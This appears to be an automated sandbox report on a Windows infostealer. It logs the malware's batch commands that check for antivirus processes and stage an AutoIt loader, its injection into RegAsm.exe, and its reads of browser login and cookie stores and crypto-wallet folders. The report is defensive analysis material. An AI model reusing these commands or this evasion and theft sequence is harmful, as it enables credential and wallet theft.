Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | Memory allocated: 2620000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | Thread delayed: delay time: 922337203685477 (this value is Int64.MaxValue / 10000, the millisecond count of .NET's TimeSpan.MaxValue, i.e. an effectively unbounded wait; listed 4 times in this section)
Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-M0QJK.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-SR5HU.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | API coverage: 5.0 %
Source: C:\Windows\SysWOW64\timeout.exe TID: 5480 | Thread sleep count: 40 > 30
Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe TID: 4960 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe TID: 4548 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | WMI queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\StrLocalGate\MmReveals.exe | Code function: 3_2_004062D5 FindFirstFileW,FindClose,3_2_004062D5
Source: C:\StrLocalGate\MmReveals.exe | Code function: 3_2_00402E18 FindFirstFileW,3_2_00402E18
Source: C:\StrLocalGate\MmReveals.exe | Code function: 3_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,3_2_00406C9B
Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Code function: 14_2_005747B7 GetFileAttributesW,FindFirstFileW,FindClose,14_2_005747B7
Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Code function: 14_2_00573B4F FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,14_2_00573B4F
Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Code function: 14_2_00573E72 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,14_2_00573E72
Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Code function: 14_2_0057C16C FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,14_2_0057C16C
Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Code function: 14_2_0057CB81 FindFirstFileW,FindClose,14_2_0057CB81
Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Code function: 14_2_0057CC0C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,14_2_0057CC0C
Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Code function: 14_2_0057F445 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,14_2_0057F445
Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Code function: 14_2_0057F5A2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,14_2_0057F5A2
Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Code function: 14_2_0057F8A3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,14_2_0057F8A3
Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Code function: 14_2_00525D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,14_2_00525D13
Source: Eco.pif, 0000000E.00000003.2331706857.0000000001604000.00000004.00000020.00020000.00000000.sdmp, Eco.pif, 0000000E.00000003.2320733420.0000000001602000.00000004.00000020.00020000.00000000.sdmp, Eco.pif, 0000000E.00000003.2330323847.0000000001603000.00000004.00000020.00020000.00000000.sdmp, Eco.pif, 0000000E.00000002.2334396849.0000000001604000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.2584519297.00000000058D4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp | Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Code function: 14_2_005843B9 BlockInput,14_2_005843B9
Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Code function: 14_2_00525240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,14_2_00525240
Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Code function: 14_2_00545BDC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,14_2_00545BDC
Source: C:\StrLocalGate\MmReveals.exe | Code function: 3_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,3_2_004062FC
Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Code function: 14_2_005686B0 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,14_2_005686B0
Source: C:\Windows\SysWOW64\tasklist.exe | Process token adjusted: Debug (2 identical events)
Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Code function: 14_2_0053A284 SetUnhandledExceptionFilter,14_2_0053A284
Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Code function: 14_2_0053A2B5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_0053A2B5
Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Memory written: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe base: 700000 value starts with: 4D5A (4D5A is the "MZ" magic of a PE header: a PE image is being written into the foreign RegAsm.exe process)
Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Memory written: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe base: 700000
Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Memory written: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe base: 418000
Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Code function: 14_2_0056914C LogonUserW,14_2_0056914C
Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Code function: 14_2_00525240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,14_2_00525240
Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Code function: 14_2_00571932 SendInput,keybd_event,14_2_00571932
Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Code function: 14_2_0057504F mouse_event,14_2_0057504F
Source: C:\StrLocalGate\MmReveals.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k copy Humor Humor.cmd & Humor.cmd & exit
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 154571
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "TRUEANALOGMINDOC" Pepper
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Lt + Blake + Tranny + Category 154571\i
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\154571\Eco.pif 154571\Eco.pif 154571\i
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout 5
Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Process created: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe (2 identical events)
Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Code function: 14_2_005686B0 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,14_2_005686B0
Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Code function: 14_2_00574D89 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,14_2_00574D89
Source: MmReveals.exe, 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmp, MmReveals.exe, 00000003.00000002.1750600445.00000000028A5000.00000004.00000020.00020000.00000000.sdmp, Eco.pif, 0000000E.00000000.1699550344.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Eco.pif | Binary or memory string: Shell_TrayWnd
Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Code function: 14_2_0053878B cpuid 14_2_0053878B
Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_0057E0CA GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,14_2_0057E0CA
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_00550652 GetUserNameW,14_2_00550652
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_0054409A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,14_2_0054409A
                    Source: C:\StrLocalGate\MmReveals.exeCode function: 3_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,3_2_00406805
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: RegAsm.exe, 00000014.00000002.2584603940.00000000058DB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.2585074100.0000000005942000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

                    Stealing of Sensitive Information

                    Source: Yara match | File source: dump.pcap, type: PCAP
                    Source: Yara match | File source: 14.3.Eco.pif.486a450.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 20.2.RegAsm.exe.700000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0000000E.00000003.2257485805.0000000004EC8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000003.2257260838.00000000048DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000003.2315350794.0000000004823000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000003.2317192962.000000000497F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000014.00000002.2565104285.0000000000702000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000003.2259828700.0000000004821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000003.2266853177.0000000003F2B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000003.2316981318.0000000004A21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000003.2260248187.00000000048DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000003.2266944790.0000000004A6B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000003.2259567795.0000000004A21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000003.2260441214.000000000497F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000003.2260351843.0000000004EDB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000003.2266772468.0000000003EA2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000003.2317320057.00000000048DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000003.2260198982.0000000004A21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000003.2260600980.0000000004821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000003.2257336074.000000000497F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000003.2259618326.000000000486B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000003.2259650438.000000000497F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000003.2260600980.0000000004861000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000003.2259764346.00000000048DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: Eco.pif PID: 2004, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 4856, type: MEMORYSTR
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: ElectrumE#
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000028B4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: $kq1C:\Users\user\AppData\Roaming\Electrum\wallets\*
                    Source: RegAsm.exe, 00000014.00000002.2584603940.00000000058DB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \??\C:\Users\user\AppData\Roaming\com.liberty.jaxx\*
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000028B4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Exodus\exodus.walletLRkq`u
                    Source: RegAsm.exe, 00000014.00000002.2584603940.00000000058DB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\wallets\*
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: ExodusE#
                    Source: RegAsm.exe, 00000014.00000002.2584603940.00000000058DB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\*app-store*p
                    Source: RegAsm.exe, 00000014.00000002.2584603940.00000000058DB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\wallets\*
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000028B4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: $kq&%localappdata%\Coinomi\Coinomi\walletsLRkq
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000028B4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: $kq5C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\atomic\
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Binance\
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Guarda\
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
                    Source: Eco.pif | Binary or memory string: WIN_81
                    Source: Eco.pif | Binary or memory string: WIN_XP
                    Source: Eco.pif | Binary or memory string: WIN_XPe
                    Source: Eco.pif.5.dr | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyteP
                    Source: Eco.pif | Binary or memory string: WIN_VISTA
                    Source: Eco.pif | Binary or memory string: WIN_7
                    Source: Eco.pif | Binary or memory string: WIN_8
                    Source: Yara match | File source: 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000014.00000002.2568169273.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 4856, type: MEMORYSTR

                    Remote Access Functionality

                    Source: Yara match | File source: dump.pcap, type: PCAP
                    Source: Yara match | File source: 14.3.Eco.pif.486a450.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 20.2.RegAsm.exe.700000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0000000E.00000003.2257485805.0000000004EC8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000003.2257260838.00000000048DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000003.2315350794.0000000004823000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000003.2317192962.000000000497F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000014.00000002.2565104285.0000000000702000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000003.2259828700.0000000004821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000003.2266853177.0000000003F2B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000003.2316981318.0000000004A21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000003.2260248187.00000000048DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000003.2266944790.0000000004A6B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000003.2259567795.0000000004A21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000003.2260441214.000000000497F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000003.2260351843.0000000004EDB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000003.2266772468.0000000003EA2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000003.2317320057.00000000048DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000003.2260198982.0000000004A21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000003.2260600980.0000000004821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000003.2257336074.000000000497F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000003.2259618326.000000000486B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000003.2259650438.000000000497F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000003.2260600980.0000000004861000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000003.2259764346.00000000048DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: Eco.pif PID: 2004, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 4856, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Code function: 14_2_00586733 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 14_2_00586733
